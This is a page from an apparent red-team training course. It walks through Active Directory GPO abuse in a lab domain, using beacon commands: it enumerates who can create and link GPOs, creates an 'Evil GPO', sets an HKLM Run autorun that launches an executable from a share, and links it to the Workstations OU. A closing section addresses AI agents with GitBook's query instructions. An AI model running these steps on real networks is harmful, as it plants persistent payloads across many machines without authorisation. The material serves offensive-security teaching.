> For the complete documentation index, see [llms.txt](https://yamortsa.gitbook.io/rto/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://yamortsa.gitbook.io/rto/group-policy/create-and-link-a-gpo.md). # Create & Link a GPO Group Policy Objects are stored in *CN=Policies,CN=System* \*\*\*\* - principals that can create new GPOs in the domain have the "Create groupPolicyContainer objects" privilege over this object. We can find these with PowerView's `Get-DomainObjectAcl` cmdlet by looking for those that have "CreateChild" rights on the "Group-Policy-Container", and then resolving their SIDs to readable names. ``` beacon> powershell Get-DomainObjectAcl -Identity "CN=Policies,CN=System,DC=dev,DC=cyberbotic,DC=io" -ResolveGUIDs | ? { $_.ObjectAceType -eq "Group-Policy-Container" -and $_.ActiveDirectoryRights -contains "CreateChild" } | % { ConvertFrom-SID $_.SecurityIdentifier } DEV\Developers ``` This shows that members of the "Developers" group can create new GPOs. \\ Being able to create a GPO doesn't achieve anything unless it can be linked to an OU. The ability to link a GPO to an OU is controlled on the OU itself by granting "Write gPLink" privileges. This is also something we can find with PowerView by first getting all of the domain OUs and piping them into Get-DomainObjectAcl again. Iterate over each one looking for instances of "WriteProperty" over "GP-Link" . ``` beacon> powershell Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq "GP-Link" -and $_.ActiveDirectoryRights -match "WriteProperty" } | select ObjectDN,ActiveDirectoryRights,ObjectAceType,SecurityIdentifier | fl ObjectDN              : OU=Workstations,DC=dev,DC=cyberbotic,DC=io ActiveDirectoryRights : ReadProperty, WriteProperty ObjectAceType         : GP-Link SecurityIdentifier    : S-1-5-21-569305411-121244042-2357301523-1107 beacon> powershell ConvertFrom-SID S-1-5-21-569305411-121244042-2357301523-1107 DEV\Developers ``` This shows that members of the "Developers" group can link GPOs to the "Workstations" OU. \\ GPOs can be managed from the command line via the PowerShell RSAT modules. These are an optional install and so usually only found on management workstations. The `Get-Module` cmdlet will show if they are present. ``` beacon> powershell Get-Module -List -Name GroupPolicy | select -expand ExportedCommands Key Value --- ----- Backup-GPO Backup-GPO Block-GPInheritance Block-GPInheritance Copy-GPO Copy-GPO Get-GPInheritance Get-GPInheritance Get-GPO Get-GPO [...] ``` \\ Use the `New-GPO` cmdlet to create and link a new GPO. ``` beacon> powershell New-GPO -Name "Evil GPO" DisplayName : Evil GPO DomainName : dev.cyberbotic.io Owner : DEV\bfarmer Id : 550f6672-bdd0-4e3d-8907-628ee6909f26 GpoStatus : AllSettingsEnabled Description : CreationTime : 9/8/2022 1:30:17 PM ModificationTime : 9/8/2022 1:30:17 PM UserVersion : AD Version: 0, SysVol Version: 0 ComputerVersion : AD Version: 0, SysVol Version: 0 WmiFilter : ``` \\ Some abuses can be implemented directly using RSAT. For example, the `Set-GPPrefRegistryValue` cmdlet can be used to add an HKLM autorun key to the registry. ``` beacon> powershell Set-GPPrefRegistryValue -Name "Evil GPO" -Context Computer -Action Create -Key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" -ValueName "Updater" -Value "C:\Windows\System32\cmd.exe /c \\dc-2\software\dns_x64.exe" -Type ExpandString ``` \\ Next, apply the GPO to the target OU. ``` beacon> powershell Get-GPO -Name "Evil GPO" | New-GPLink -Target "OU=Workstations,DC=dev,DC=cyberbotic,DC=io" GpoId : 550f6672-bdd0-4e3d-8907-628ee6909f26 DisplayName : Evil GPO Enabled : True Enforced : False Target : OU=Workstations,DC=dev,DC=cyberbotic,DC=io Order : 4 ``` \\ Remember that HKLM autoruns require a reboot to execute. --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://yamortsa.gitbook.io/rto/group-policy/create-and-link-a-gpo.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.